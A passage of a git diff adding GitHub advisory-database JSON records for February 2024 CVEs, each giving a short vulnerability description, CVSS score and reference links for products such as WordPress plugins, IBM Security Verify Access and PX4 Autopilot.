+ "details": "The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the wpr_update_form_action_meta function. This makes it possible for unauthenticated attackers to post metadata via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0511"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/dc8bef03-51e0-4448-bddd-85300104e875?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T06:15:51Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-phfx-2gmw-mfx5/GHSA-phfx-2gmw-mfx5.json b/advisories/unreviewed/2024/02/GHSA-phfx-2gmw-mfx5/GHSA-phfx-2gmw-mfx5.json
new file mode 100644
index 0000000000000..69e1589cc07aa
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-phfx-2gmw-mfx5/GHSA-phfx-2gmw-mfx5.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-phfx-2gmw-mfx5",
+ "modified": "2024-02-07T12:30:26Z",
+ "published": "2024-02-07T12:30:26Z",
+ "aliases": [
+ "CVE-2024-1118"
+ ],
+ "details": "The Podlove Subscribe button plugin for WordPress is vulnerable to UNION-based SQL Injection via the 'button' attribute of the podlove-subscribe-button shortcode in all versions up to, and including, 1.3.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1118"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/podlove/podlove-subscribe-button-wp-plugin/commit/b16b7a2e98db4c642ca671b0aede4dbfce4578b3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032152%40podlove-subscribe-button&new=3032152%40podlove-subscribe-button&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f234f05f-e377-4e89-81e1-f47ff44eebc5?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-07T11:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-pj36-rhxp-gj4x/GHSA-pj36-rhxp-gj4x.json b/advisories/unreviewed/2024/02/GHSA-pj36-rhxp-gj4x/GHSA-pj36-rhxp-gj4x.json
new file mode 100644
index 0000000000000..d95452441e54b
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-pj36-rhxp-gj4x/GHSA-pj36-rhxp-gj4x.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pj36-rhxp-gj4x",
+ "modified": "2024-02-06T03:33:00Z",
+ "published": "2024-02-06T03:33:00Z",
+ "aliases": [
+ "CVE-2024-20811"
+ ],
+ "details": "Improper caller verification in GameOptimizer prior to SMR Feb-2024 Release 1 allows local attackers to configure GameOptimizer.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20811"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.samsungmobile.com/securityUpdate.smsb?year=2024&month=02"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-06T03:15:07Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-pjx4-f26p-jc98/GHSA-pjx4-f26p-jc98.json b/advisories/unreviewed/2024/02/GHSA-pjx4-f26p-jc98/GHSA-pjx4-f26p-jc98.json
new file mode 100644
index 0000000000000..a4352249129ba
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-pjx4-f26p-jc98/GHSA-pjx4-f26p-jc98.json
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pjx4-f26p-jc98",
+ "modified": "2024-02-03T00:31:34Z",
+ "published": "2024-02-03T00:31:34Z",
+ "aliases": [
+ "CVE-2024-1195"
+ ],
+ "details": "A vulnerability classified as critical was found in iTop VPN up to 4.0.0.1. Affected by this vulnerability is an unknown functionality in the library ITopVpnCallbackProcess.sys of the component IOCTL Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The identifier VDB-252685 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1195"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252685"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252685"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.youtube.com/watch?v=JdQMINPVJd8"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-404"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-02T22:15:25Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-pmqc-v2g6-qw5w/GHSA-pmqc-v2g6-qw5w.json b/advisories/unreviewed/2024/02/GHSA-pmqc-v2g6-qw5w/GHSA-pmqc-v2g6-qw5w.json
new file mode 100644
index 0000000000000..40a7bed2a3f34
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-pmqc-v2g6-qw5w/GHSA-pmqc-v2g6-qw5w.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pmqc-v2g6-qw5w",
+ "modified": "2024-02-08T15:30:26Z",
+ "published": "2024-02-08T12:30:48Z",
+ "aliases": [
+ "CVE-2023-6515"
+ ],
+ "details": "Authorization Bypass Through User-Controlled Key vulnerability in Mia Technology Inc. MİA-MED allows Authentication Abuse.This issue affects MİA-MED: before 1.0.7.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6515"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.usom.gov.tr/bildirim/tr-24-0087"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-639"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-02-08T10:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/02/GHSA-pmvf-52m5-fj89/GHSA-pmvf-52m5-fj89.json b/advisories/unreviewed/2024/02/GHSA-pmvf-52m5-fj89/GHSA-pmvf-52m5-fj89.json
new file mode 100644
index 0000000000000..eba9968ff4152
--- /dev/null
+++ b/advisories/unreviewed/2024/02/GHSA-pmvf-52m5-fj89/GHSA-pmvf-52m5-fj89.json
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmvf-52m5-fj89", + "modified": "2024-02-06T12:30:31Z", + "published": "2024-02-06T12:30:31Z", + "aliases": [ + "CVE-2024-24941" + ], + "details": "In JetBrains IntelliJ IDEA before 2023.3.3 a plugin for JetBrains Space was able to send an authentication token to an inappropriate URL", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24941" + }, + { + "type": "WEB", + "url": "https://www.jetbrains.com/privacy-security/issues-fixed/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T10:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pp44-pghv-3r5p/GHSA-pp44-pghv-3r5p.json b/advisories/unreviewed/2024/02/GHSA-pp44-pghv-3r5p/GHSA-pp44-pghv-3r5p.json new file mode 100644 index 0000000000000..0bffce42034dd --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pp44-pghv-3r5p/GHSA-pp44-pghv-3r5p.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp44-pghv-3r5p", + "modified": "2024-02-06T06:30:32Z", + "published": "2024-02-06T06:30:32Z", + "aliases": [ + "CVE-2023-43518" + ], + "details": "Memory corruption in video while parsing invalid mp2 clip.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43518" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-ppj5-c4cc-c277/GHSA-ppj5-c4cc-c277.json b/advisories/unreviewed/2024/02/GHSA-ppj5-c4cc-c277/GHSA-ppj5-c4cc-c277.json new file mode 100644 index 0000000000000..7a6a1692fb790 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-ppj5-c4cc-c277/GHSA-ppj5-c4cc-c277.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ppj5-c4cc-c277", + "modified": "2024-02-06T15:32:06Z", + "published": "2024-02-06T15:32:06Z", + "aliases": [ + "CVE-2024-0911" + ], + "details": "A flaw was found in Indent. This issue may allow a local user to use a specially-crafted file to trigger a heap-based buffer overflow, which can lead to an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0911" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-0911" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260399" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pqjc-g576-r2pc/GHSA-pqjc-g576-r2pc.json b/advisories/unreviewed/2024/02/GHSA-pqjc-g576-r2pc/GHSA-pqjc-g576-r2pc.json new file mode 100644 index 0000000000000..d842580e50452 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pqjc-g576-r2pc/GHSA-pqjc-g576-r2pc.json 
@@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqjc-g576-r2pc", + "modified": "2024-02-08T03:32:45Z", + "published": "2024-02-08T03:32:45Z", + "aliases": [ + "CVE-2024-24025" + ], + "details": "An arbitrary File upload vulnerability exists in Novel-Plus v4.3.0-RC1 and prior at com.java2nb.common.controller.FileController: upload(). An attacker can pass in specially crafted filename parameter to perform arbitrary File download.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24025" + }, + { + "type": "WEB", + "url": "https://github.com/201206030/novel-plus" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24025.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T01:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pv6w-6xw6-fcqg/GHSA-pv6w-6xw6-fcqg.json b/advisories/unreviewed/2024/02/GHSA-pv6w-6xw6-fcqg/GHSA-pv6w-6xw6-fcqg.json new file mode 100644 index 0000000000000..c067fa04afe30 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pv6w-6xw6-fcqg/GHSA-pv6w-6xw6-fcqg.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pv6w-6xw6-fcqg", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24865" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Noah Kagan Scroll Triggered Box allows Stored XSS.This issue affects Scroll Triggered Box: from n/a through 2.3.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24865" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/dreamgrow-scroll-triggered-box/wordpress-scroll-triggered-box-plugin-2-3-cross-site-scripting-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T07:15:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pvg3-4m54-rhwj/GHSA-pvg3-4m54-rhwj.json b/advisories/unreviewed/2024/02/GHSA-pvg3-4m54-rhwj/GHSA-pvg3-4m54-rhwj.json new file mode 100644 index 0000000000000..049d85d4f1d5e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pvg3-4m54-rhwj/GHSA-pvg3-4m54-rhwj.json 
@@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pvg3-4m54-rhwj", + "modified": "2024-02-08T21:30:33Z", + "published": "2024-02-01T09:30:18Z", + "aliases": [ + "CVE-2023-51939" + ], + "details": "An issue in the cp_bbs_sig function in relic/src/cp/relic_cp_bbs.c of Relic relic-toolkit 0.6.0 allows a remote attacker to obtain sensitive information and escalate privileges via the cp_bbs_sig function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51939" + }, + { + "type": "WEB", + "url": "https://github.com/relic-toolkit/relic/issues/284" + }, + { + "type": "WEB", + "url": "https://gist.github.com/liang-junkai/1b59487c0f7002fa5da98035b53e409f" + }, + { + "type": "WEB", + "url": "https://github.com/liang-junkai/Relic-bbs-fault-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pvj2-qwhc-2m88/GHSA-pvj2-qwhc-2m88.json b/advisories/unreviewed/2024/02/GHSA-pvj2-qwhc-2m88/GHSA-pvj2-qwhc-2m88.json new file mode 100644 index 0000000000000..9ad50c73d84ba --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pvj2-qwhc-2m88/GHSA-pvj2-qwhc-2m88.json 
@@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pvj2-qwhc-2m88", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-02T00:31:28Z", + "aliases": [ + "CVE-2024-21869" + ], + "details": "In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, the affected product stores plaintext credentials in various places. This may allow an attacker with local access to see them.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21869" + }, + { + "type": "WEB", + "url": "https://rapidscada.org/contact/" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-256", + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T00:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pvv5-7gwv-cvmf/GHSA-pvv5-7gwv-cvmf.json b/advisories/unreviewed/2024/02/GHSA-pvv5-7gwv-cvmf/GHSA-pvv5-7gwv-cvmf.json new file mode 100644 index 0000000000000..869d473ffcf70 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pvv5-7gwv-cvmf/GHSA-pvv5-7gwv-cvmf.json 
@@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pvv5-7gwv-cvmf", + "modified": "2024-02-03T03:30:28Z", + "published": "2024-02-03T03:30:28Z", + "aliases": [ + "CVE-2023-43016" + ], + "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) could allow a remote user to log into the server due to a user account with an empty password. IBM X-Force ID: 266154.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43016" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/266154" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-258", + "CWE-521" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T01:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-px37-v4hm-7f6q/GHSA-px37-v4hm-7f6q.json b/advisories/unreviewed/2024/02/GHSA-px37-v4hm-7f6q/GHSA-px37-v4hm-7f6q.json new file mode 100644 index 0000000000000..e5b00f4fa082e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-px37-v4hm-7f6q/GHSA-px37-v4hm-7f6q.json 
@@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-px37-v4hm-7f6q", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50328" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 may allow a remote attacker to view session identifiers passed via URL query strings. IBM X-Force ID: 275110.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50328" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275110" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-598", + "CWE-668" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-px9w-2f28-5wvj/GHSA-px9w-2f28-5wvj.json b/advisories/unreviewed/2024/02/GHSA-px9w-2f28-5wvj/GHSA-px9w-2f28-5wvj.json new file mode 100644 index 0000000000000..0249dbadb17cf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-px9w-2f28-5wvj/GHSA-px9w-2f28-5wvj.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-px9w-2f28-5wvj", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20004" + ], + "details": "In Modem NL1, there is a possible system crash due to an improper input validation. This could lead to remote denial of service, if NW sent invalid NR RRC Connection Setup message, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01191612; Issue ID: MOLY01195812 (MSV-985).", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20004" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pxh3-hmj4-xhjv/GHSA-pxh3-hmj4-xhjv.json b/advisories/unreviewed/2024/02/GHSA-pxh3-hmj4-xhjv/GHSA-pxh3-hmj4-xhjv.json new file mode 100644 index 0000000000000..7c0b6c218afd7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pxh3-hmj4-xhjv/GHSA-pxh3-hmj4-xhjv.json 
@@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pxh3-hmj4-xhjv", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-24255" + ], + "details": "A Race Condition discovered in geofence.cpp and mission_feasibility_checker.cpp in PX4 Autopilot 1.14 and earlier allows attackers to send drones on unintended missions.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24255" + }, + { + "type": "WEB", + "url": "https://github.com/Drone-Lab/PX4-Autopilot/blob/report-the-faliure-of-precheck/report-the-faliure-of-precheck.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-pxh8-3c47-gmr6/GHSA-pxh8-3c47-gmr6.json b/advisories/unreviewed/2024/02/GHSA-pxh8-3c47-gmr6/GHSA-pxh8-3c47-gmr6.json new file mode 100644 index 0000000000000..e66739e59d921 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-pxh8-3c47-gmr6/GHSA-pxh8-3c47-gmr6.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pxh8-3c47-gmr6", + "modified": "2024-02-07T00:30:25Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2023-45222" + ], + "details": "\n\n\nAn attacker with access to the web application that has the vulnerable software could introduce arbitrary JavaScript by injecting a cross-site scripting payload into the \"autorefresh\" parameter.\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45222" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-023-04" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T22:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q37v-9p49-p44f/GHSA-q37v-9p49-p44f.json b/advisories/unreviewed/2024/02/GHSA-q37v-9p49-p44f/GHSA-q37v-9p49-p44f.json new file mode 100644 index 0000000000000..b0d82a8fbd65e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q37v-9p49-p44f/GHSA-q37v-9p49-p44f.json 
@@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q37v-9p49-p44f", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-02-03T03:30:27Z", + "aliases": [ + "CVE-2023-31006" + ], + "details": "IBM Security Access Manager Container (IBM Security Verify Access Appliance 10.0.0.0 through 10.0.6.1 and IBM Security Verify Access Docker 10.0.0.0 through 10.0.6.1) is vulnerable to a denial of service attacks on the DSC server. IBM X-Force ID: 254776.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31006" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254776" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q45w-f72f-v464/GHSA-q45w-f72f-v464.json b/advisories/unreviewed/2024/02/GHSA-q45w-f72f-v464/GHSA-q45w-f72f-v464.json new file mode 100644 index 0000000000000..7fa8f6d792bc6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q45w-f72f-v464/GHSA-q45w-f72f-v464.json 
@@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q45w-f72f-v464", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2023-6673" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in National Keep Cyber Security Services CyberMath allows Reflected XSS.This issue affects CyberMath: from v.1.4 before v.1.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6673" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-24-0080" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q524-mh68-7m66/GHSA-q524-mh68-7m66.json b/advisories/unreviewed/2024/02/GHSA-q524-mh68-7m66/GHSA-q524-mh68-7m66.json new file mode 100644 index 0000000000000..18051b99a96aa --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q524-mh68-7m66/GHSA-q524-mh68-7m66.json 
